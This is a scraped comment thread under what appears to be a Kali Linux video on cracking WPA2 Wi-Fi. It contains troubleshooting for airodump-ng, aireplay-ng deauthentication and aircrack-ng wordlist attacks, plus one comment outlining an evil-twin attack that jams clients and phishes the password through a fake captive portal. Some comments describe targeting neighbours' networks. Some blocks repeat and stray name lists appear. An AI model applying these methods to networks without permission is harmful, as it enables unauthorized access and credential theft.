You can use aircrack, wifite, reaver, etc.. but all these method will only work if the wordlist being used has to have the actual password within in or else its useless. So for those reading don’t assume that your breaking into everyone’s wifi using this method as it did his, the password to his network he already added into a wordlist that he used to basically cross reference using aircrack nothing special.
@@VikramSinghRajput0001 One way is to create an access point that has the same name as the original one. You will need 2 Wi-Fi adapters. One for jamming clients and one for the malicious access point a.k.a Evil Twin. Jammer should emit stronger signals or be close in range to disrupt communication and possibly kick devices out of the network. AP will not have any password but a web-server set up. When your Wi-Fi connection drops frequently (because of the jammer), you'll open up your Wi-Fi settings to see what's happening, and at that moment you will discover the Evil Twin AP, which you will probably connect with "there's a glitch" on mind. And when you do so, your phone automatically opens a website which will greet you with a fake warning message eg. "firmware update", "2step auth". And there will be an input field where you enter the password of the AP.
Because you already captured the handshake during deauth, you are be able to hash whatever user entered and compare if they match with the captured one. This allows you to tell users what they entered is fake and build one layer of trust. This is a bit involved process, but tools like EvilTwin and Airgeddon will make it a piece of cake. You can look them up on GitHub.
If you capture a Handshake or a PMKID with Airgeddon, you choose the WPA/WPA2 Offline Decryption Menu option and then you choose the option: Aircrack + Crunch Brute force attack on the Handshake/PMKID capture file, it tells me to write the length of the key, how do you know the length of the key? How do you know if it has only uppercase letters, if it has only lowercase letters, if it has only numbers, if it has only symbols or if the key has characters of all types?
This method is only efficient if you have a previously collected data with you, like the 4 way handshake capture and a ton of info on the password. It's not for entirely finding a password, and it doesn't work like the movies, sometimes you gotta get out there and collect necessary info before doing something, or the wireless owner should be dumb enough to use passwords that are in public wordlists for years.
@@jeremym-i6x what? decrypt it instead of matching it through the wordlists? I don't get you but it seems like it'll be a better way to hack the password which I'll never find in wordlists...
The final part is the most haunting because the cracking process is not as easy as it might look so your best bet is to create your own password list using crunch if you already know a thing or two about the target or you can crack the password online with servers equipped with very fast GPUs but this last choice will cost you money. Personally I prefer to use CRUNCH combined with a good computer that has a powerful GPU and a lot of ram
yes its easy to deauth a device and capture a handshake.. i crack with a different machine running windows. you might get a better understanding if you learn the method shown in the video before moving on to using more advanced tools without comprehending how it works
i dont know if these password lists will ever find anything.. i mean even if i use Rockyou that has 14 million passwords.. it's still not gonna have my password. I only have my wife's name and some numbers and characters and still didn't find it.. i mean not all lists will have it all..
hello. after running command "airodump-ng wlan0" my wifi adapter doesn't showing me clients. do you know what to do.please help me my wifi adapter is in monitor mode.
At the end of the day, it’s just showcase and how the technique is done. Obviously, if you get a hash, you can take it off-line and utilize better word lists if you have more time.
The deauth doesnt appear to be limiting my victim device in any way, and im not able to capture the handshake at all, even if i manually reconnect my victim device. The MAC adresses for both the AP and the victim device are correct, but the victim device still has internet, and no handshake is ever captured.. I already "hacked" it by using Fern, but with a custom wordlist that included the wifi pwd on purpose, just to test that it worked - so in theory it should work using AirCrack too.. Any advice? :) Oh, and any tips for how i could bruteforce instead of using a wordlist too? :D 💜
when your wifi card goes into monitor mode, you lose the wifi connection but you can still continue with whatever capture / attack you're trying to do. You can turn off monitor mode after and it will start working again
I always use WPA 2 and WPA3 on another router with a 25 character password very mixed and I keep WPS disabled. I just got a new router which allows me to install and use wireguard as my VPN server for 40 bucks. Im using mullvad with my linux setup. However 1 flaw in my new router is it shows WPS is enabled and there is no option to disable it. With the password Im using is my router/VPN server still OK ? I used kali with a program Wifite to try and crack the WPS setup I have and it didn't work. I haven't tried every tool but wonder if I should make my password longer or not bother ?? I only had success with a WPS exploit when the password was pretty weak. Could they still get my wps pin ? Maybe Im being extra paranoid but just wondering.
That’s a really good question. The best way to do is try to crack it. But if you ran Wifite I didn’t crack it. I think you should be in good shape. There’s probably other tools out there, but I wouldn’t get too crazy about it.
Bro I ran iwconfig on my Rooted A51F and by wlan0 it says : IEEE Mode:Managed Frequency:2.412 Ghz Bit Rate :43.3 mb/s ........ What da heck does that mean
My bsssid. Doesn’t have any stations after I ran a airodump-c capture even though I have my phone and other devices connected to the network… pls any idea on what to do
Hi, i'm totally new. Can you help when I type this: airodump-ng -C7 -w Capture-Pat -d 24:D3:F2:F9:1A:28 wlan0mon Checking available frequencies, this could take few seconds. Done. No valid frequency given. How to solve this ? thank you
Not so fast. When I tried going to monitor mode, something came up saying 2 filths are doing some crap and I have to kill the interfering processes. When I did that one alone were killed which was my NetworkManager which it disabled. What do I do because I don't know
Yeah, remember this is just for demonstration purposes. The network manager if it gets disabled, you have to restart the interface. Or just reboot your virtual machine
No matter how much I try, only some (2nd and 4th) EAPOL packets are captured. Does anyone know a solution? Fixing the channel, manually reconnecting the device to the AP, or sending a deauth packet doesn't work. Despite extensive searching, I haven't been able to find a solution. Please please help me😭😭
@@InfoSecPat I would like to see how it is done in real conditions, where the victim is far away, but not so far away that the connection will be impossible, such a test requires two people, one comes up with a quite complicated password and allows the second person to try to crack such a password
i like to use KONSOLE and split the view, makes it easy to airodump in one terminal while you aireplay in a second terminal, all in same window.. u cant sudo apt install it though, has to be built from script also bro, not to bust your chops, but your cap file is gonna be polluted with deauth packets, you dont even need to start airodump writing the output until AFTER you deauth the device.. if you watch the number of lost frames you can see exactly when the device's connection gets reset, and then start airodump -w
where did you find that password.txt file that contain the password "TrytoHackMe2023" ?? what if the password is in different language ex: french, urdu etc , or number ?
Dear Pat, thank you for such a useful tutorial. Unfortunately, I am even less than a beginner and the operation is broken up because of the network disconnecting me during the process. I am using Kali Linux 24.2. I'm following step by step exactly as you are showing us! Thank you! My aim is to be second Kevin Mitnick
second time going over this video in conjunction with many other leading ethical hacking/ kali linux videos and i appreciate your thoroughness in explanation and the way you show it as well. keep it up .
Just let my neighbour know his password after I shutdown his network to prove my point. I used a 500,000 word dictionary based on animals, characters, popular names ect. I found the password @ 48% and 2:36 seconds. Strange that my pci Ac1300 refuses to go into monitor mode but mu $5 Asus UsbN13 has no problem's? 🤔 Could it be a driver error?
You can use aircrack, wifite, reaver, etc.. but all these method will only work if the wordlist being used has to have the actual password within in or else its useless. So for those reading don’t assume that your breaking into everyone’s wifi using this method as it did his, the password to his network he already added into a wordlist that he used to basically cross reference using aircrack nothing special.
So what works better ? For hacking an Wifi
Thank you Sir. So what are the other methods?
Is there any other method to get without word list?
so plz tell me is there any other powerfull method to get the password...without the wordlist method
@@VikramSinghRajput0001 One way is to create an access point that has the same name as the original one. You will need 2 Wi-Fi adapters. One for jamming clients and one for the malicious access point a.k.a Evil Twin. Jammer should emit stronger signals or be close in range to disrupt communication and possibly kick devices out of the network. AP will not have any password but a web-server set up.
When your Wi-Fi connection drops frequently (because of the jammer), you'll open up your Wi-Fi settings to see what's happening, and at that moment you will discover the Evil Twin AP, which you will probably connect with "there's a glitch" on mind. And when you do so, your phone automatically opens a website which will greet you with a fake warning message eg. "firmware update", "2step auth". And there will be an input field where you enter the password of the AP.
Because you already captured the handshake during deauth, you are be able to hash whatever user entered and compare if they match with the captured one. This allows you to tell users what they entered is fake and build one layer of trust. This is a bit involved process, but tools like EvilTwin and Airgeddon will make it a piece of cake. You can look them up on GitHub.
Do we need to have to be connected to internet to perform this attack. Pls someone answer me please
No, you don’t have to be connected to the Internet
thanks for informing that I should use a chipset that supports monitor mode! thx
No problem!
crunch
If you capture a Handshake or a PMKID with Airgeddon, you choose the WPA/WPA2 Offline Decryption Menu option and then you choose the option: Aircrack + Crunch Brute force attack on the Handshake/PMKID capture file, it tells me to write the length of the key, how do you know the length of the key?
How do you know if it has only uppercase letters, if it has only lowercase letters, if it has only numbers, if it has only symbols or if the key has characters of all types?
This method is only efficient if you have a previously collected data with you, like the 4 way handshake capture and a ton of info on the password. It's not for entirely finding a password, and it doesn't work like the movies, sometimes you gotta get out there and collect necessary info before doing something, or the wireless owner should be dumb enough to use passwords that are in public wordlists for years.
I remember doing this in 2010 with WEP passcodes and Linux BackTrack
Same bro ! I cant believe its still the same process in 2024 , why cant you just capture the handshake and decrypt it instead of a wordlist
@@jeremym-i6xthe thing is wpa2 is too secute to decrypt
@@jeremym-i6x what? decrypt it instead of matching it through the wordlists? I don't get you but it seems like it'll be a better way to hack the password which I'll never find in wordlists...
Wait, does that mean it's actually possible to crack my neighbor's WiFi?
@@jeremym-i6xhow do you do that ?
The final part is the most haunting because the cracking process is not as easy as it might look so your best bet is to create your own password list using crunch if you already know a thing or two about the target or you can crack the password online with servers equipped with very fast GPUs but this last choice will cost you money. Personally I prefer to use CRUNCH combined with a good computer that has a powerful GPU and a lot of ram
yes its easy to deauth a device and capture a handshake.. i crack with a different machine running windows.
you might get a better understanding if you learn the method shown in the video before moving on to using more advanced tools without comprehending how it works
Its a really worthy 10minutes Thanks for ur efforts ❤
My pleasure 😊
Im at that point of life again where i think i can become a hacker
The method of that video really works to you?
any know why the Password.txt it doesn't appear to me?
me too. Can u fixed it
I have to first unzip it in your kali Linux app
i dont know if these password lists will ever find anything.. i mean even if i use Rockyou that has 14 million passwords.. it's still not gonna have my password. I only have my wife's name and some numbers and characters and still didn't find it.. i mean not all lists will have it all..
yeah cause you are then only person using wifi
Been doing this kind of work since 97. I like your style my man. Cheers
Awesome! Thank you! I appreciate that 😎
@@InfoSecPat of course! Lot of changes happening soon with the pentesting industry... Looking forward to seeing more.
There is no password.txt in my ls bro
Yeah because that is wordlist i made. You will not have that.
3:30 lol
are these methods still working on 2024 ??
When I type iwconfig, I do not get the wlan0 option, do I need to install a driver for it?
sudo apt-get install iwconfig
Saçmalıktan ibaret world list te her sifre olmayabilir! Olsa bile milyonlarca kombinasyon ndemektir
hello. after running command "airodump-ng wlan0" my wifi adapter doesn't showing me clients. do you know what to do.please help me my wifi adapter is in monitor mode.
bruteforce?
lucky for some hackers.
easy for some content creators 😅
At the end of the day, it’s just showcase and how the technique is done. Obviously, if you get a hash, you can take it off-line and utilize better word lists if you have more time.
My Passwords.txt file didnt appeared sad T_T
Yeah, because that passwords file is one that I made you can get your own password file off the Internet or you can make your own word list
Okay, thank you! I will try generate my list and keep trying. Thanks for the video! @@InfoSecPat
From where you got password.txt please explain
Its in the program
In the last click. They given me that message (Failed to open Capture-Par-01.cap (2):No such file or directory
The deauth doesnt appear to be limiting my victim device in any way, and im not able to capture the handshake at all, even if i manually reconnect my victim device.
The MAC adresses for both the AP and the victim device are correct, but the victim device still has internet, and no handshake is ever captured..
I already "hacked" it by using Fern, but with a custom wordlist that included the wifi pwd on purpose, just to test that it worked - so in theory it should work using AirCrack too..
Any advice? :)
Oh, and any tips for how i could bruteforce instead of using a wordlist too? :D 💜
You must be really in a close range if you're using your internal wifi adapter, to be able to do a deauth
Why when i do check kill i lose wifi
when your wifi card goes into monitor mode, you lose the wifi connection but you can still continue with whatever capture / attack you're trying to do.
You can turn off monitor mode after and it will start working again
Skip it it's not mandatory
Because it’s putting your WiFi card in monitor mode
you probably try to crack ur own wifi
I was wondering the same thing
Its more like bruteforce the password bro
I always use WPA 2 and WPA3 on another router with a 25 character password very mixed and
I keep WPS disabled. I just got a new router which allows me to install and use wireguard as my
VPN server for 40 bucks. Im using mullvad with my linux setup. However 1 flaw in my new router
is it shows WPS is enabled and there is no option to disable it. With the password Im using is
my router/VPN server still OK ? I used kali with a program Wifite to try and crack the WPS setup
I have and it didn't work. I haven't tried every tool but wonder if I should make my password longer
or not bother ??
I only had success with a WPS exploit when the password was pretty weak. Could they still get my
wps pin ? Maybe Im being extra paranoid but just wondering.
That’s a really good question. The best way to do is try to crack it. But if you ran Wifite I didn’t crack it. I think you should be in good shape. There’s probably other tools out there, but I wouldn’t get too crazy about it.
Bro I ran iwconfig on my Rooted A51F and by wlan0 it says : IEEE Mode:Managed Frequency:2.412 Ghz Bit Rate :43.3 mb/s ........
What da heck does that mean
My bsssid. Doesn’t have any stations after I ran a airodump-c capture even though I have my phone and other devices connected to the network… pls any idea on what to do
Ever figured it out brother?
not airodump -c, airodump -d (or --bssid) is the switch for bssid mac
Hey im in the end step when i will put the word list in and i can put it in even the rockyou.txt
Hi, i'm totally new. Can you help when I type this:
airodump-ng -C7 -w Capture-Pat -d 24:D3:F2:F9:1A:28 wlan0mon
Checking available frequencies, this could take few seconds.
Done.
No valid frequency given.
How to solve this ? thank you
put wifi adapter in monitor mode
Hello. Could I ask for a good dictionary.txt? maybe a link? Regards
Can we crack wpa2 password with the help of rainbow tables ?
I wanna see this done with no dictionary and only rainbow tables
Can i use aircrack ng in termux android smartphones?
How to switch my wlan0 channel to fixed another channel?
hi everyone, in my case there is no such thing like Password.txt ...... WHYYYY
That’s a password list that I created.
its too slow to get handshake packet, maybe wait for couples of days
How is the password.txt created ? Appreciate your answer
I created a password list. You can make your own or use something like rockyou in kali.
@@InfoSecPatis this useful at all for cracking into networks that don’t contain this password.txt?
While using wireshark i am facing problem failed to create compose table
Please provide me solution i am not able to save file on /home/kali
did you find answer , i also have problem like your
How to do this in Android using Termux? Tell me please
2:53 why my terminal shows no BBSID scanned. There’s just a blank space. Help me.
Same
You need external wifi adaptor
Why my terminal so slow
Idk why it’s slow. How much ram you have?
Wlan0 text does not appear on me. I have a Linux installed on virtualbox. 1:50
I can't password.txt, help please
how to use aircrack-ng without rockyou
Lopez Matthew Lewis Susan Young Kenneth
Young Michelle Brown Jose Johnson Ruth
Bro I just want to pay my game
Ok so did you put ur password in the word list or no
How to crack with not use Dictionary ?
You can use other techniques like automated Wi-Fi pen, testing tools
Have any method for Android termux with root?
Not so fast. When I tried going to monitor mode, something came up saying 2 filths are doing some crap and I have to kill the interfering processes.
When I did that one alone were killed which was my NetworkManager which it disabled.
What do I do because I don't know
Yeah, remember this is just for demonstration purposes. The network manager if it gets disabled, you have to restart the interface. Or just reboot your virtual machine
2:54
followed along and it doesnt show anything after airodump-ng wlan0. my nic is in monitor mode
In the de authentication process, how do I know what's my access point?
thanks bro .. I got my neighbor password free now
Don’t do anything you don’t have permission to do. Hope he gave you permission 😊
Jackson Mark Harris Steven Harris Carol
Would be helpful if you explained what the switches are
bro i cannot handshke whats my problem
What should I do if the password file I have does not contain the key?
You have to use a password list that may contain the file in this video. It’s only for educational purposes and understand how it’s done.
No matter how much I try, only some (2nd and 4th) EAPOL packets are captured. Does anyone know a solution? Fixing the channel, manually reconnecting the device to the AP, or sending a deauth packet doesn't work. Despite extensive searching, I haven't been able to find a solution. Please please help me😭😭
How do I create temprorary access point like you did, that I can make audit on?
I just had an extra router that I utilize for this video
you just add your paswoed to your wordlist thats why is so quick
Yeah, because it’s an educational video on how the process is done
@@InfoSecPat I would like to see how it is done in real conditions, where the victim is far away, but not so far away that the connection will be impossible, such a test requires two people, one comes up with a quite complicated password and allows the second person to try to crack such a password
wow. finally someone with a brain....
Why there's no password.txt in my file??
That file is my own
Is it possible to perform this with Twitter authentication codes?
No, I don’t believe so.
just out of curiosity why do i need an external wireless card even for laptop?
Cause it needs packet injection
i like to use KONSOLE and split the view, makes it easy to airodump in one terminal while you aireplay in a second terminal, all in same window.. u cant sudo apt install it though, has to be built from script
also bro, not to bust your chops, but your cap file is gonna be polluted with deauth packets, you dont even need to start airodump writing the output until AFTER you deauth the device.. if you watch the number of lost frames you can see exactly when the device's connection gets reset, and then start airodump -w
I don't get eapol caputer need help!!!
do i have to run the kalinux for the mac monterrey to read the 10.15 ?
I’m not sure what you’re asking. I’m sorry.
why i dont have EAPOL files in wireshark ? and when i trakc my iphone under "Notes" it doesnt say "EAPOL" , nothing stands there...
where did you find that password.txt file that contain the password "TrytoHackMe2023" ?? what if the password is in different language ex: french, urdu etc , or number ?
It’s a word list that I created for demonstrating in this video. You’re not gonna have that file.
Dear Pat, thank you for such a useful tutorial. Unfortunately, I am even less than a beginner and the operation is broken up because of the network disconnecting me during the process. I am using Kali Linux 24.2. I'm following step by step exactly as you are showing us! Thank you! My aim is to be second Kevin Mitnick
The reality is quite different...
Can i hack a wifi without any adaptor please tell me
Nope you need it
yeah mate mine is just showing 2 with no wreless extenstions on it??
Just make sure the driver is installed for your wireless card
❤❤❤❤❤❤👋👋👋👋👋❤
nice video
Thanks for the visit
second time going over this video in conjunction with many other leading ethical hacking/ kali linux videos and i appreciate your thoroughness in explanation and the way you show it as well. keep it up .
I tryed and get errer for get password?
but you did not show how iso for the wordlist is in the terminal
That my wordlist I created
if you think you can crack wpa2psk, forget it. it possible but not happening in real world
you show us a revealed password but don't indicate how you actually did it and also what dictionary you used, upload it or tell us where it is?
Simplified , basic. But hopefully script kiddies don't try to use this real world or they will get a knock on the door or worse.
bro i not found eapol, how to fix it?
Make sure you did all the steps
KEY NOT FOUND
for me i try it in my wifi and thats what i have i think thats beause the password in CAPITALletter
what’s the “password.txt” contains? That’s what’s important around there!
Where I found the password.txt is the same with the Rock?
It’s a password list that I created myself
@@InfoSecPat only with rock.txt I can't break password 🔑 maybe I need to find another list? 🤔
Just let my neighbour know his password after I shutdown his network to prove my point.
I used a 500,000 word dictionary based on animals, characters, popular names ect. I found the password @ 48% and 2:36 seconds.
Strange that my pci Ac1300 refuses to go into monitor mode but mu $5 Asus UsbN13 has no problem's? 🤔
Could it be a driver error?
I don’t want to know how to use it. I want to learn how it works, so I can make my own version of it.
hey after the airodump ng wlan0 command it doesnt show any networks but it switches between channels and all that
did u find a solution for this?
9:13 i dont get the purple words... and i dont know why
Those are my folders
When I use "airodump-ng wlan0" no connection appears even if time elapses, what can I do?
It's because you don't have a wifi adapters
Use wlan0mon
an alternative to this would be wifite2
I did not understand how to activate the new tab because I opened a new tab, turned on the root, and followed the steps, but it did not work
Please make a video on channel changing issue in airodump-ng because no video on RUclips regarding this issue
Do i need a wifi adapter? Because some commends dont work
Ofc you need that
Yes, you need an external adapter that supports promiscuous mode
When ever i try to send death packets i keep getting bssid not found
Can you share the password.txt file?
Can someone do for me notes step-by-step in Notes
Please I need it in Words
do I need to make the same steps everytime I want to hack a wifi?
Hello whay thé password.twt not apear to me when i set ls what IS the problem